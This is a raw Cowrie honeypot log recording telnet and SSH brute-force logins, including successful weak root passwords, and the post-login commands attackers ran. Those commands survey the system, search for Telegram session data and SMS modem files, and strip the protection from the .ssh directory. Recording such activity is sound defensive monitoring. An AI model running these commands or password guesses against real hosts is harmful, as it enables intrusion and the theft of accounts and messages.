{"eventid":"cowrie.session.closed","duration":12.853790044784546,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:30.485000Z","src_ip":"60.19.222.5","session":"16aad42b4ac2"}
{"eventid":"cowrie.session.closed","duration":12.906181335449219,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:30.524483Z","src_ip":"60.19.222.5","session":"6277091dd92c"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39958,"dst_ip":"1.2.3.4","dst_port":23,"session":"2ff10e41d563","protocol":"telnet","message":"New connection: 60.19.222.5:39958 (1.2.3.4:23) [session: 2ff10e41d563]","sensor":"my-vps","timestamp":"2025-09-09T05:03:30.696476Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39957,"dst_ip":"1.2.3.4","dst_port":23,"session":"c818ecccb4f3","protocol":"telnet","message":"New connection: 60.19.222.5:39957 (1.2.3.4:23) [session: c818ecccb4f3]","sensor":"my-vps","timestamp":"2025-09-09T05:03:30.709648Z"}
{"eventid":"cowrie.session.closed","duration":12.293060064315796,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:32.612537Z","src_ip":"60.19.222.5","session":"daf0a12d9ca7"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39965,"dst_ip":"1.2.3.4","dst_port":23,"session":"846cb2ca43c3","protocol":"telnet","message":"New connection: 60.19.222.5:39965 (1.2.3.4:23) [session: 846cb2ca43c3]","sensor":"my-vps","timestamp":"2025-09-09T05:03:32.776976Z"}
{"eventid":"cowrie.session.closed","duration":12.820619106292725,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:34.512323Z","src_ip":"60.19.222.5","session":"d7d5123eb069"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":39966,"dst_ip":"1.2.3.4","dst_port":23,"session":"10095660e353","protocol":"telnet","message":"New connection: 60.19.222.5:39966 (1.2.3.4:23) [session: 10095660e353]","sensor":"my-vps","timestamp":"2025-09-09T05:03:34.735941Z"}
{"eventid":"cowrie.session.closed","duration":12.688465118408203,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:41.528188Z","src_ip":"60.19.222.5","session":"713964e977c1"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40105,"dst_ip":"1.2.3.4","dst_port":23,"session":"8bd0bcb47e45","protocol":"telnet","message":"New connection: 60.19.222.5:40105 (1.2.3.4:23) [session: 8bd0bcb47e45]","sensor":"my-vps","timestamp":"2025-09-09T05:03:41.646514Z"}
{"eventid":"cowrie.session.closed","duration":12.78359580039978,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:43.493182Z","src_ip":"60.19.222.5","session":"c818ecccb4f3"}
{"eventid":"cowrie.session.closed","duration":12.822038412094116,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:43.518447Z","src_ip":"60.19.222.5","session":"2ff10e41d563"}
{"eventid":"cowrie.session.closed","duration":12.806148767471313,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:45.583054Z","src_ip":"60.19.222.5","session":"846cb2ca43c3"}
{"eventid":"cowrie.session.closed","duration":12.834138631820679,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:47.570014Z","src_ip":"60.19.222.5","session":"10095660e353"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40231,"dst_ip":"1.2.3.4","dst_port":23,"session":"d21b4b2a8111","protocol":"telnet","message":"New connection: 60.19.222.5:40231 (1.2.3.4:23) [session: d21b4b2a8111]","sensor":"my-vps","timestamp":"2025-09-09T05:03:47.757583Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40110,"dst_ip":"1.2.3.4","dst_port":23,"session":"997b55aaf6b6","protocol":"telnet","message":"New connection: 60.19.222.5:40110 (1.2.3.4:23) [session: 997b55aaf6b6]","sensor":"my-vps","timestamp":"2025-09-09T05:03:50.666861Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40112,"dst_ip":"1.2.3.4","dst_port":23,"session":"45a286459932","protocol":"telnet","message":"New connection: 60.19.222.5:40112 (1.2.3.4:23) [session: 45a286459932]","sensor":"my-vps","timestamp":"2025-09-09T05:03:50.708302Z"}
{"eventid":"cowrie.session.closed","duration":"301.4","message":"Connection lost after 301.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:51.943612Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40118,"dst_ip":"1.2.3.4","dst_port":23,"session":"9659438ead53","protocol":"telnet","message":"New connection: 60.19.222.5:40118 (1.2.3.4:23) [session: 9659438ead53]","sensor":"my-vps","timestamp":"2025-09-09T05:03:52.743030Z"}
{"eventid":"cowrie.session.closed","duration":12.889626264572144,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:03:54.536056Z","src_ip":"60.19.222.5","session":"8bd0bcb47e45"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40257,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b9b0c5de309","protocol":"telnet","message":"New connection: 60.19.222.5:40257 (1.2.3.4:23) [session: 2b9b0c5de309]","sensor":"my-vps","timestamp":"2025-09-09T05:03:54.808714Z"}
{"eventid":"cowrie.session.closed","duration":12.717702627182007,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:00.475214Z","src_ip":"60.19.222.5","session":"d21b4b2a8111"}
{"eventid":"cowrie.session.closed","duration":12.813376903533936,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:03.480165Z","src_ip":"60.19.222.5","session":"997b55aaf6b6"}
{"eventid":"cowrie.session.closed","duration":12.822175741195679,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:03.530403Z","src_ip":"60.19.222.5","session":"45a286459932"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40399,"dst_ip":"1.2.3.4","dst_port":23,"session":"59bc8dfa3ef8","protocol":"telnet","message":"New connection: 60.19.222.5:40399 (1.2.3.4:23) [session: 59bc8dfa3ef8]","sensor":"my-vps","timestamp":"2025-09-09T05:04:03.733841Z"}
{"eventid":"cowrie.session.closed","duration":12.747329235076904,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:05.490266Z","src_ip":"60.19.222.5","session":"9659438ead53"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40398,"dst_ip":"1.2.3.4","dst_port":23,"session":"55e4a3d9fa50","protocol":"telnet","message":"New connection: 60.19.222.5:40398 (1.2.3.4:23) [session: 55e4a3d9fa50]","sensor":"my-vps","timestamp":"2025-09-09T05:04:06.664911Z"}
{"eventid":"cowrie.session.closed","duration":12.715621709823608,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:07.524266Z","src_ip":"60.19.222.5","session":"2b9b0c5de309"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40412,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e2f17fb5bae","protocol":"telnet","message":"New connection: 60.19.222.5:40412 (1.2.3.4:23) [session: 7e2f17fb5bae]","sensor":"my-vps","timestamp":"2025-09-09T05:04:07.646103Z"}
{"eventid":"cowrie.session.connect","src_ip":"121.147.217.111","src_port":49118,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0290a5eb6cb","protocol":"ssh","message":"New connection: 121.147.217.111:49118 (1.2.3.4:22) [session: a0290a5eb6cb]","sensor":"my-vps","timestamp":"2025-09-09T05:04:12.040614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-09-09T05:04:12.041738Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-09-09T05:04:12.373420Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-09T05:04:14.034186Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:04:15.366580Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.closed","duration":12.757215738296509,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:16.490853Z","src_ip":"60.19.222.5","session":"59bc8dfa3ef8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:16.767419Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-09T05:04:16.768215Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-09T05:04:16.768682Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:17.101202Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:17.874393Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-09-09T05:04:17.875113Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:18.207269Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:18.924556Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T05:04:18.925287Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:19.280741Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.closed","duration":12.749950170516968,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:19.414764Z","src_ip":"60.19.222.5","session":"55e4a3d9fa50"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40660,"dst_ip":"1.2.3.4","dst_port":23,"session":"04a77bf6c9a5","protocol":"telnet","message":"New connection: 60.19.222.5:40660 (1.2.3.4:23) [session: 04a77bf6c9a5]","sensor":"my-vps","timestamp":"2025-09-09T05:04:19.610895Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:19.958403Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-09-09T05:04:19.959087Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:20.318021Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.closed","duration":12.78419804573059,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:20.430238Z","src_ip":"60.19.222.5","session":"7e2f17fb5bae"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40684,"dst_ip":"1.2.3.4","dst_port":23,"session":"37a14ddce0b2","protocol":"telnet","message":"New connection: 60.19.222.5:40684 (1.2.3.4:23) [session: 37a14ddce0b2]","sensor":"my-vps","timestamp":"2025-09-09T05:04:20.691585Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:21.080097Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-09-09T05:04:21.080781Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:21.412602Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:22.091128Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-09-09T05:04:22.091803Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:22.423298Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:23.171470Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-09-09T05:04:23.172245Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:23.506522Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:24.228221Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-09-09T05:04:24.229060Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:24.591764Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:25.271039Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-09-09T05:04:25.271821Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:25.603904Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.closed","duration":12.816087007522583,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:32.426931Z","src_ip":"60.19.222.5","session":"04a77bf6c9a5"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":40828,"dst_ip":"1.2.3.4","dst_port":23,"session":"7eac2ab60094","protocol":"telnet","message":"New connection: 60.19.222.5:40828 (1.2.3.4:23) [session: 7eac2ab60094]","sensor":"my-vps","timestamp":"2025-09-09T05:04:32.643009Z"}
{"eventid":"cowrie.session.closed","duration":12.752203226089478,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:33.443716Z","src_ip":"60.19.222.5","session":"37a14ddce0b2"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":35908,"dst_ip":"1.2.3.4","dst_port":22,"session":"17783d4d9203","protocol":"ssh","message":"New connection: 92.118.39.62:35908 (1.2.3.4:22) [session: 17783d4d9203]","sensor":"my-vps","timestamp":"2025-09-09T05:04:35.296722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:04:35.298037Z","src_ip":"92.118.39.62","session":"17783d4d9203"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T05:04:35.328148Z","src_ip":"92.118.39.62","session":"17783d4d9203"}
{"eventid":"cowrie.login.failed","username":"amandabackup","password":"amandabackup","message":"login attempt [amandabackup/amandabackup] failed","sensor":"my-vps","timestamp":"2025-09-09T05:04:35.419242Z","src_ip":"92.118.39.62","session":"17783d4d9203"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:36.451526Z","src_ip":"92.118.39.62","session":"17783d4d9203"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":42534,"dst_ip":"1.2.3.4","dst_port":22,"session":"26bd87086494","protocol":"ssh","message":"New connection: 14.103.112.104:42534 (1.2.3.4:22) [session: 26bd87086494]","sensor":"my-vps","timestamp":"2025-09-09T05:04:55.326466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:04:55.327830Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:04:55.531281Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.login.success","username":"root","password":"M1cha3l","message":"login attempt [root/M1cha3l] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:04:56.819679Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.session.closed","duration":"44.9","message":"Connection lost after 44.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:56.895792Z","src_ip":"121.147.217.111","session":"a0290a5eb6cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:57.272260Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:04:57.272964Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:04:57.273800Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:57.473986Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:04:57.925056Z","src_ip":"14.103.112.104","session":"26bd87086494"}
